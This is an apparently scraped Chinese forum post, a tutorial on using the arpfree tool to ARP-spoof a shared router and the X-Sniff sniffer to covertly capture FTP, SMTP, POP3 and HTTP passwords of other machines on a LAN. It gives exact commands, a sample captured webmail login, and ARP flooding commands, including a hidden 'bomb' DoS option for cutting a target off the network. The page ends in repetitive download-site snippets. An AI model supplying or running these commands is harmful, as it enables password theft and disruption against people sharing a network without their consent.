试验环境:
一台八口共享上网路由器,接八台电脑 !在其中一台机器上嗅探密码
步骤如下:
1,首先ping 192.168.0.1 网关,然后用arp -a 获得网关Mac地址 0000ea0123de
2,使用arpfree欺骗网关,让它将其他机器发向网关的包发给嗅探主机
命令如下:
arpfree 0000ea0123de 123412341234 request 1.1.1.1
3,启动sniff开始嗅探
命令如下:
xsniff -pass -hide -log pass.log
4,打开pass.log就能察看嗅探到的密码!
示例:
TCP [05/10/06 22:17:40]
192.168.0.8->202.108.9.77 Port: 1158->80
HOST: mail.163.com USER: 1111111, PASS: 1111111
Arpfree + X-Sniff嗅探局域网密码
游泳的鱼 发表于 2008-1-14 15:48:00
0
推荐
ARP简介:
要使用ARP欺骗,必须启动ip路由功能,修改(添加)注册表选项:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
发送ARP报文的软件,可以发送任意 源,目的 地址的ARP报文,可以结合Sniffer做不少的事~不用老在Sniffer里做ARP包了~
不过要安装WinPacp 3.0驱动先...
发送的时候可以选择ARP的TYPE。如果是ARP请求报文,则只要输入要访问的IP地址。
如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址
最后的发送速度可选参数为:(大小写敏感..我觉得挺不好的)
fast---------最快
hear---------每60ms一个包(可能是比较适合结合Sniffer做监听)
slowhear-----每500ms一个包
auto---------每1秒一个包
slow---------每2秒个包
使用方法如下:
***********************************************************************
(1)Send arp packet in "request mode" Examples:
arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
| | | | |
你的网卡地址 | | | |
对方网卡地址 | | 速度
arp方式 |
|
你的IP地址
***********************************************************************
(2)Send arp packet in "reply mode" Examples:
arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto
| | | | | |
你的网卡地址 | | | | |
对方网卡地址 | | | 速度
arp方式 | |
| |
你的IP地址 |
|
对方IP地址
***********************************************************************
反击“Lan终结者”的办法:
1:发动比他更强烈的攻击:
arpfree 0050fc272b26 ffffffffffff request 1.1.1.1 fast
| | | | |
你的网卡地址 | | | |
对方网卡地址 | | 速度
arp方式 |
|
你的IP地址
2:交换机竞争:
arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
| | | | |
你的网卡地址 | | | |
你想攻击的人的网卡地址 | | 速度
arp方式 |
|
你的IP地址
方法1将导致他IP地址冲突(比“终结者”来的猛烈多了)
方法2将使得他无法连接网络(由于交换机把他的流量都给你了)
***********************************************************************
因为有朋友反映在非交换环境下,如使用HUB的情况下,无法对目标进行打击
故增加参数“bomb”,使用方法如下:
假设目标为IP:192.168.237.109 目标mac为:011a8575a436
攻击命令如下:
arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb
其实就是进行简单的ARP DOS攻击,快速刷新目标的ARP缓存,可以在消耗自身较少系统资源的情况下
造成和PDOS工具类似的效果,并且如果你不停止攻击,对方重启以后也无法正常进入系统
(当然前提是他没拔网线)。
其实这样做是十分不厚道的....所以参数就没有写在程序的 HELP 里面,大家慎用...
=========================================================================
X-Sniff嗅探器
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出.
==========================================================================
实验开始...
试验环境:
一台八口共享上网路由器,接八台电脑,在其中一台机器上嗅探密码
步骤如下:
1.首先ping 192.168.0.1 网关,然后用arp -a 获得网关Mac地址 0000ea0123de
2.使用arpfree欺骗网关,让它将其他机器发向网关的包发给嗅探主机 命令如下:
arpfree 0000ea0123de 123412341234 request 1.1.1.1 hear
3.启动X-Sniff开始嗅探 命令如下:
xsniff -pass -hide -log pass.log
4.打开pass.log就能察看嗅探到的密码!
示例:
TCP [05/10/06 22:17:40]
192.168.0.8->202.108.9.77 Port: 1158->80
HOST: mail.163.com USER: 1111111, PASS: 1111111
如果是非交换环境,可省略1,2步。
面提到的xsniff.exe 十分小巧,但是功能强大,呵呵呵!
使用说明 请看下面的
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明
输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出.
上面提到的arpfree工具使用说明请看
http://www.netexpert.cn/viewthread.php?tid=550
分享到:
相关推荐
针对这种情况,一款名为"xsniff"的嗅探工具应运而生,它专门用于探测邮箱密码,帮助用户识别并反击盗号者。 xsniff是一款功能强大的网络数据包分析软件,它能够实时监控网络流量,通过解析网络传输的数据包,找出...
**xsniff DOS嗅探器**是一款专为Windows操作系统,特别是Windows 7设计的数据包嗅探工具。在信息技术领域,嗅探器是一种网络诊断和分析工具,它允许用户捕获和查看网络上的数据包,这对于网络管理员、安全专家以及...
XSniff是一款专为IT专业人士设计的轻量级命令行嗅探工具,其主要功能是捕捉并解析局域网内的多种网络协议数据,包括FTP(文件传输协议)、SMTP(简单邮件传输协议)、POP3(邮局协议版本3)以及HTTP(超文本传输协议...
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出
XSniff是一款轻量级的命令行网络嗅探工具,专用于在局域网环境中捕获并分析数据包。它能够帮助用户监控和解析特定的网络协议,例如FTP(文件传输协议)、SMTP(简单邮件传输协议)、POP3(邮局协议版本3)以及HTTP...
-port 端口 过滤端口 -log 文件名 将输出保存到文件 -asc 以ASCII形式输出 -hex 以16进制形式输出 用法示例 xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 xsniff.exe -...
《XSniff:网络数据包嗅探工具的深度解析》 在信息技术日益发达的今天,网络数据包嗅探工具在网络安全、系统管理以及网络故障排查等领域扮演着重要角色。其中,XSniff是一款广泛使用的数据包嗅探软件,对于网络专业...
《Xsniff Shell:网络安全中的嗅探神器》 在信息技术高速发展的今天,网络安全的重要性日益凸显。其中,网络嗅探作为一种常见的网络安全技术,被广泛应用于网络监控、数据包分析以及安全漏洞检测等领域。Xsniff ...
xsniff.exe
很不错的DOS工具压缩包,内含xsniff,nc等经典dos工具。
- **密码嗅探**:`xsniff.exe -pass -hide -log c:\pass.log`这一命令将启动一个监听会话,专门用于捕获密码信息,并将其记录到`c:\pass.log`文件中,同时隐藏在屏幕上显示的密码信息。 - **停止监听**:通常使用`...
【X-sniff监听工具】是一种专门针对编程语言和环境设计的网络嗅探工具,它能够帮助程序员在多种开发环境中捕获、分析和调试网络数据。X-sniff支持诸如Delphi、VC(Visual C++)、VB(Visual Basic)、PowerBuilder、...
【xsniffer扫描器】是一款基于命令行的网络嗅探工具,主要针对局域网环境中的多种网络协议进行数据包捕获,以便分析和提取其中的敏感信息,如FTP、SMTP、POP3和HTTP协议的密码。这款工具因其简单易用的特性,在网络...
【X-Sniff】是一款专为编程人员设计的网络数据包嗅探工具,它能够帮助开发者监测和分析网络通信过程中的数据流量。在网络安全和软件调试领域,X-Sniff扮演着重要的角色,使得程序员能够深入理解网络协议的工作机制,...
79. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 80. services.msc---本地服务设置 81. Sndvol32-------音量控制程序 82. sfc.exe--------系统文件检查器 83. sfc /scannow---...
基本格式 63 附录8下载软件 64 瑞士军刀:nc.exe 64 扫锚工具:xscan.exe 67 命令行方式嗅探器: xsniff.exe 69 终端服务密码破解: tscrack.exe 70 其它 72 附录9 FTP命令详解 75 附录10 ...